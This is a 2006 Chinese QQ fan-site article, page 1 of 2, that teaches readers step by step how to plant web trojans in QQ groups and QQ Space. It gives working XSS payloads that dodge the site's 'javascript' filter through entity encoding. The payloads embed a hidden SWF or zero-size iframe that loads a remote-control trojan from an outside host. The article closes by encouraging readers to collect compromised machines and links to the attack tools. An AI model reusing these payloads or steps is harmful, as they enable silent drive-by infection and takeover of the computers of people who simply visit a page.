您当前的位置:首页>QQ资讯>正文[漂亮博客免费申请] [收藏本页] [搜索更多]
热点文章

·手机开腾讯QQ业务新出路 免费
·3DQQ秀:QQ3D图标点亮之令牌在
·当我的QQ号码被盗之后发生的意
·消协提醒:申请奥运QQ靓号 小心
·可爱小老鼠QQ头像
·QQ空间V3.1版本正式上线,我的空
·免费领养到QQ宠物的6种途径
·让同一条QQ消息的文字颜色各异
·QQ号码激活的常见问题及案例分
·QQ木马到底怎么做?QQ挂马方法

 
推荐文章

·卡通美女QQ头像(3)
·6月18日最新QQ空间代码,最新的
·挂八趣通宝:免费获得QQ币
·QQ会员首届头像原创设计大赛作
·QQ卡通头像[荐!]
·5月22日QQ空间3.0最新破解代码
·天使情缘漂亮的播放器请供申请
·我爱我的--天使QQ宠物宝宝限量
·QQ呢称特效字符大放送
·QQ空间新手图文教程

 

QQ木马到底怎么做?QQ挂马方法大揭密
QQ我要爱你 www.QQ5120.com 日期:2006-7-24 21:58:38 来源:

有无数上网用户每天都在使用QQ,大家往往注重于QQ尾巴病毒、QQ传木马之类的攻击方式,却很少有人注意到我们经常访问的QQ群、QQ空间里面隐藏着更大的安全危险,远比QQ尾巴病毒、QQ传木马之类的隐蔽得多,危害更加大。今天我们就来看看攻击者是如何在QQ群和QQ空间中挂上网页木马,攻击浏览用户的!

  一、QQ群中简简单单挂木马

  在一个比较火的QQ群里挂上网页木马,一定很容易得到许多肉鸡的。怎么在QQ群里挂马,是在群里面群发木马的网址吗?现在已经不会有人上这样的当了。我们要作的只是在群里面发一个作了手脚的帖子。

  步骤一:制作网页木马

  在攻击前,我们首先要制作好一个木马网页。这里笔者使用了“上兴远程控制木马V2006”,这个木马功能非常强,以前笔者曾作过介绍。用上兴生成木马服务端程序“muma.exe”后,将服务端上传到某个网站上去,假设地址为“http://www.binghewu.com.cn/muma.exe”。

  打开“南域剑盟网页木马生成器”,在中间的“URL”处填入木马的链接地址,点击“生成”按钮,将会在生成器当前目录下生成一个名为“script.txt”的文件(如图1)。用记事本打开刚才生成的“script.txt”文件,可以看到木马代码,代码是经过加密的,一般人很难看出这是网页木马代码来(如图2)。复制所有代码,然后将代码插入到任意一个正常的网页中,就可以得到一个网页木马了。

  小提示:将木马代码插入正常的网页中,其位置一般是位于“”标记中间。

点击放大此图片

图1 用木马生成器生成木马代码

点击放大此图片

图2 加密的木马代码…

  步骤二:制作SWF木马

  在以前的QQ群中,本来只需要发一张带图片的帖子就可以实现挂马的目的。不过现在QQ群也改版了,挂马就需要多一个步骤了,我们还需要将网页木马嵌入Flash文件中。二、QQ空间玩挂马

  自从腾讯推出QQ空间(QQ-zone)后,各种跨站漏洞便不断暴出。虽然腾讯已经对QQ-zone进行了一次全面的更新,禁止了运行自定义脚本,不过通过我们的测试,发现所做的限制是很简单的,只需要转换一下字符就可以突破限制,在QQ空间上任意挂马。

  方法一:挂Flash木马www.qq5120.com

  打开QQ空间后,在页面中点击“自定义”按钮,在弹出的工具条上依次单击“个性设置”→“新建模块”命令,也可在QQ空间页面中直接按下+组合键,打开自定义对话框。在弹出的网页对话框中输入任意“模块名称”,点击“提交”按钮,弹出创建成功的提示框。然后出现“添加内容”对话框,将其中的“网址”、“图片”中自带的“http://”删除,保持“链接名称”为空白。在“评论”中输入如下代码(如图5):

以下是引用片段:
以下是引用片段:
“<img src="javascri&#112;t:document.getElementById('Mlogo').&#105;nnerHTML+='<div style=\'position:absolute;top:0;left:0;\'><EMBED src=\'http://www.binghewu.com.cn/muma.swf\' quality=high wmode=\'transparent\' WIDTH=\'925\' HEIGHT=\'655\' TYPE=\'application/x-shockwave-flash\'></div>';"> ”

  代码中的Flash地址“http://www.binghewu.com.cn/muma.swf”,是刚才制作上传的SWF木马链接地址,可以更改为其它任意Flash木马文件地址。提交代码后,用户进入此QQ空间时,会自动打开显示上传的SWF木马Flash,从而在后台下载运行上兴木马服务端程序。

图5 通过自定义模块添加SWF木马

  小提示:QQ空间是通过检测用户提交的代码中,是否含用“javascript”之类的字符进行过滤的。在上面的代码中,将脚本部分代码用ASCII编码之后替换躲过了过滤,如“javascript”可以替换为“javascrip”,“p”为“p”的ASCII编码。具体ASCII编码转换可到“http://www.killadm.ful.cn/ascii.asp”查询(如图6)。

点击放大此图片

图6 通过网页转换字符ASCII码

  方法二:挂网页木马

  上面的方法是直接在QQ空间中挂上一个Flash木马文件,实现的方法虽然比较简单,不过这个Flash文件有可能会让别人起疑心。既然我们可以在QQ空间中写入自定义代码,何不干脆直接挂上网页木马呢?

  用上面同样的方法新建一个模块,代码如下:

以下是引用片段:
“<div id=DI><img src="javascri&#112;t:DI.&#105;nnerHTML='<&#105;frame src="http://www.binghewu.com.cn/muma.htm" width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></&#105;frame>'" style=display:none></div>”

  同样的,在上面的代码中已经作了ASCII码转换躲过过滤;“http://www.binghewu.com.cn/muma.htm”是网页木马的链接地址,可以换成其它木马网页地址。代码中的其它语句是用来定义模块大小的,由于设置为0,该模块将在QQ空间中被隐藏,但是并不影响木马网页的打开与运行。这里为了说明攻击效果,笔者对代码作了一些修改,将木马网页显示为新浪首页,说明完全可以在QQ空间中打开其它木马网页的(如图7)。www.qq5120.com

点击放大此图片

图7 在QQ空间中挂上的新浪页面

  怎么样,在QQ群和QQ空间中挂马是不是很简单?掌握了这个方法,只要在比较火一点的QQ群或QQ空间中挂上你的木马,你很快就可以肉鸡成群了!

 

  网页木马生成器 http://www.hackol.com/down.asp?id=4141&downid=0

  SWF插入机 http://www.25hack.com/heike/soft/107/108/111/

  

本新闻共2页,当前在第1页  1  2  

进入QQ我要爱你论坛交流!


[关闭本页] [返回顶部]
上一篇:七夕节将有病毒入侵 慎对QQ聊天好友送玫瑰
下一篇:消协提醒:申请奥运QQ靓号 小心手机费被多扣


∷相关文章∷

·消协提醒:申请奥运QQ靓号 小心手机费被多扣
·七夕节将有病毒入侵 慎对QQ聊天好友送玫瑰
·7月23日QQ新闻竞猜得Q币答案
·Lava-Lava开放源码 IM市场掀波澜
·夏日休闲,Q宠夏令营
·7月17日QQ新闻竞猜得Q币答案
·7.15参加新闻竞猜得Q币
·对QQ系统消息有意见?填表告诉腾讯
·手机聊QQ到底怎么聊 三种途径任你选择
·小灵通短信版移动QQ用户指令速查表